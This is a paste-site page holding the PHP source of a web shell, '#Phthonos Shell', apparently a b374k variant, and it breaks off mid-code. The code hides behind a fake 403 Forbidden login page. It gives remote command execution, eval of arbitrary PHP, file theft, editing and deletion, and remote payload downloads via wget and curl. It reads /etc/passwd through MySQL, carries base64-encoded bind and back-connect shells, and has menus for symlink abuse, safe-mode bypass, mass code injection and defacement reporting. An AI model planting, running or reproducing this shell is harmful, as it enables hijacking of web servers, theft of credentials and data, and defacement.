Untitled

From x, 4 Years ago, written in Plain Text, viewed 779 times.
URL http://paste.security-portal.cz/view/13e10193 Embed
Download Paste or View Raw
  1. <?php
  2.  
  3. error_reporting(0);
  4. @set_time_limit(0);
  5. @session_start();
  6. // configuration
  7. $xSoftware = trim(getenv("SERVER_SOFTWARE"));
  8. // server name
  9. $xServerName = $_SERVER["HTTP_HOST"];
  10. $xName = "sund4nyM0uz";
  11. $masukin = "8f4047e3233b39e4444e1aef240e80aa";  //change you password (hash md5)
  12. $nikmatin = (md5($_POST['pass']));
  13. $crotzz = 1;  // ' 0 '  no login pass
  14. if($nikmatin == $masukin){
  15.         $_SESSION['login'] = "$nikmatin";
  16. }
  17. if($crotzz){
  18.         if(!isset($_SESSION['login']) or $_SESSION['login'] != $masukin){
  19.                 die("
  20.        
  21. <html>
  22.   <head>
  23.     <title>403 Forbidden</title>
  24.     <style type=\"text/css\">
  25.         input{
  26.         margin:0;
  27.         background-color:#fff;
  28.         border:1px solid #fff;
  29.         }
  30.     </style>
  31.    <H1>Forbidden</H1>
  32.   </head>
  33.   <body>
  34. <p>You don't have permission to access on this server.</P>
  35. <hr>
  36. <address>".trim(getenv("SERVER_SOFTWARE"))." Server at ".$_SERVER['HTTP_HOST']."  Port 80</address>
  37.         <center><form method=\"post\">
  38.         <input type=\"password\" name=\"pass\">
  39.       </form></center>
  40.   </body>
  41. </html>
  42.             ");
  43.     }
  44. }
  45.  
  46. if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; } if(isset($_GET['img'])){ @ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "1.01"; $software = getenv("SERVER_SOFTWARE"); $xNamex = base64_decode("TWFuZyBhajA=");$xramex = base64_decode("OjogYjM3NGsgcjNjMGRlZCBieSA=");
  47. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
  48.  $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." >"; $pwd = realpath(".")."\\"; $v = explode("\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\"); if ($bool) { $letters .= "<a href=\"?y=".$letter.":\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "Server IP Address : ".$server_ip." <span class=\"gaya\">|</span> Your IP Address : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />"; else $buff .= "Safemode : <span class=\"gaya\">OFF<span><br />";
  49.   if(''==($df=@ini_get('disable_functions')))$buff .= "Disable_functions :<span class=\"df\">NONE</span><br />"; else $buff .= "Disable_functions : <span class=\"df\">$df<br />";
  50.   $buff .= "Add to : </font>[ <a href='http://bing.com/search?q=ip:".$server_ip."&go=&form=QBLH&filt=all' target=\"_blank\">BING SEARCH</a> ] <span class=\"gaya\">|</span> [ <a href='http://zone-h.org/archive/ip=".$server_ip."' target=\"_blank\">ZONE-H</a> ] <span class=\"gaya\">|</span> [ <a href='http://www.hack-db.com/ip_".$server_ip.".html' target=\"_blank\">HACK-DB</a> ]<br />";
  51.    $buff .= $letters."&nbsp;Dir :&nbsp;".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:300px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:300px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>Filename</th><th style=\"width:80px;\">File Size</th><th style=\"width:210px;\">File Owner</th><th style=\"width:80px;\">Attributes</th><th style=\"width:110px;\">Date Modified</th><th style=\"width:190px;\">Actions</th></tr> "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">new folder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" /> </form> </td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jv f+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQr?J EP/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41Z ZdKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6V L3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVK?u gUq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpX kHDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J?4 WtyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsU LZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYu?k 6uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr 1NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzf?w gtNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQk De/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM 0LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRr?V ovaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjG B+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwF IXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0StktGB8aihs prPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28jS2whVulCf lCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZja3ImclYa gh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92 +rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29r WhyEzc+Z2TjpSserABYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl9?5 /3Wa43fpotyCABR95zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vK C1rI6wgSmN/niYb75i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVC nim7a/ZuJC0JTwf3ARkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlx iuPB3E0/gXejiHMcYjwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3X Ie1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  52.  
  53.  
  54.  
  55.  
  56. ?>
  57. <html><head><title>#Phthonos Shell</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css">
  58. body{ background:#000000; } a { text-decoration:none; } a:hover{
  59.         border-bottom-width: 1px;
  60.         border-bottom-style: solid;
  61.         border-bottom-color: #990000;
  62. } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{
  63.         margin-top: 8px;
  64.         margin-right: 6px;
  65.         margin-bottom: 2px;
  66.         margin-left: 2px;
  67.         background-color: #990000;
  68.         height: 24px;
  69. } #menu a{
  70.         margin:0;
  71.         background:#222222;
  72.         text-decoration:none;
  73.         letter-spacing:2px;
  74.         font-family: tahoma, verdana, Arial;
  75.         color: #CC0000;
  76.         padding-top: 4px;
  77.         padding-right: 12px;
  78.         padding-bottom: 6px;
  79.         padding-left: 18px;
  80. } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{
  81.         margin:15px auto 0 auto;
  82.         border: 1px solid #333333;
  83.         color: #FFCC00;
  84. } .main {
  85.         width:97%;
  86.         margin:30px auto 10px;
  87.         padding:10px 10px 5px 10px;
  88.         border-radius:5px;
  89. -moz-border-radius:5px; -moz-box-shadow:0px 0px 10px #990000; -webkit-box-shadow:0px 0px 5px #990000;   background-color: #000000;
  90. }
  91. .domain {
  92.         color: #CC0000;
  93.         border: 1px solid #990000;
  94. }
  95. .gaya { color: #CC0000; }
  96. .df {
  97.         color: #CC0000;
  98.         font-family: tahoma, verdana, Arial;
  99. }
  100.  .gaya a { color: #CC0000; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#CC0000; margin:0 4px; border:1px solid #444444; cursor:pointer;} .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #CC0000; border-top:1px solid #CC0000; } .output { margin:auto; border:1px solid #CC0000; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #CC0000; } .explore tr:hover{
  101.         cursor:pointer;
  102.         background-color: #990000;
  103. } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0;} .info{ background:#111111; width:99%; padding:5px; margin:10px auto 5px; text-align:center; font-size:13px;} .info a{ font-size:14px;} .info span{ font-size:14px;} .jaya{ margin:5px; text-align:right; }
  104. </style>
  105. </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table>
  106.   <tr> <td rowspan="2"><table class="b_tbl"><tr><td><a href="?"><span class="b1"><img src="http://i1284.photobucket.com/albums/a571/phthonos/phbh2_zpsc5054bb8.png" width="150" height="150" border="0"></span></a></td>
  107.   </tr><tr>
  108.     <td><span class="gaya"><font color="White">PHANTOM HACKERS.PH</font></span></td>
  109.   </tr></table></td> <td><?php echo $buff; ?><br/></td>
  110.   </tr>
  111.   <tr>
  112.    
  113.   </tr>
  114. </table>
  115. </div> <!-- head info end here -->
  116.  
  117.  <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">Explore</a> <a href="?<?php echo "y=".$pwd; ?>&x=shell">Shell</a> <a href="?<?php echo "y=".$pwd; ?>&x=php">Eval</a> <a href="?<?php echo "y=".$pwd; ?>&x=mysql">MySQL</a> <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">PHPinfo</a> <a href="?<?php echo "y=".$pwd; ?>&x=netsploit">Netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&x=upload">Upload</a> <a href="?<?php echo "y=".$pwd; ?>&x=jumping">jumping</a> <a href="?<?php echo "y=".$pwd; ?>&x=symlink">Symlink</a>
  118.  
  119.   <a href="?<?php echo "y=".$pwd; ?>&x=localdomain">Domain</a>
  120.   <a href="?<?php echo "y=".$pwd; ?>&x=bypass">Bypass</a>
  121.    <a href="?<?php echo "y=".$pwd; ?>&x=zone-h">zone-h</a>
  122.   </div>
  123.  
  124.  
  125.   <!-- menu end -->
  126.   <!-- menu2 start -->
  127.  
  128.   <div id="menu"><a onClick="window.open('http://networktools.nl/reverseip/actionhandler&toolAction=toolReverseIP&toolInput=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://networktools.nl/reverseip/actionhandler&toolAction=toolReverseIP&toolInput=<?php echo $_SERVER ['SERVER_ADDR']; ?>">Site list</a>
  129.    <a href="?<?php echo "y=".$pwd; ?>&x=python">Python</a>
  130.    <a href="?<?php echo "y=".$pwd; ?>&x=cgi">CGI Shell</a>
  131.    <a href="?<?php echo "y=".$pwd; ?>&x=massbrowsersploit">Mass code Injection</a>
  132.  
  133.     <a href="?<?php echo "y=".$pwd; ?>&x=config">Config shell</a>
  134.      <a href="?<?php echo "y=".$pwd; ?>&x=wp">Wordpress</a>
  135.          <a href="?<?php echo "y=".$pwd; ?>&x=joomla">Joomla</a>
  136.          <a href="?<?php echo "y=".$pwd; ?>&x=vb">VB</a>
  137.           <a href="?<?php echo "y=".$pwd; ?>&x=safemode">Safemode</a>
  138.          <a href="?<?php echo "y=".$pwd; ?>&x=logout">Kill Shell</a>
  139.    </div> <!-- menu2 end -->
  140.  
  141.  
  142.  
  143.  <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> <form action="?y=<?php echo $pwd; ?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea> <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php }
  144.  
  145.  elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport; $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= 